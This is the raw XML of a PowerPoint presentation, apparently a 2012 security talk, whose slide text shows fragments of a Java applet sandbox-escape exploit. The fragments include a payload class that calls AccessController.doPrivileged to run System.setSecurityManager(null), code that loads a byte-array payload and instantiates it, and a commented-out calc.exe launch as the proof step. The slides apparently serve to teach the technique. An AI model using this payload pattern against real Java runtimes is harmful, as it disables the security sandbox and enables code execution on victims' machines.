            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>, new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>[] {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                //byte_payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>class1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>newInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//System.out.println("SecurityManager:" + System.getSecurityManager());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            //Runtime.getRuntime().exec("calc.exe");</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="120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495800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smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MyPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>AccessController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doPrivileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>() throws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.setSecurityManager(null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>}</a:t>
            </a:r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3133</TotalTime>
  <Words>1118</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>237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Nytro</dc:creator>
  <cp:lastModifiedBy>dana_stelista</cp:lastModifiedBy>
  <cp:revision>178</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-25T21:51:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-12-01T02:01:45Z</dcterms:modified>
</cp:coreProperties>
</file>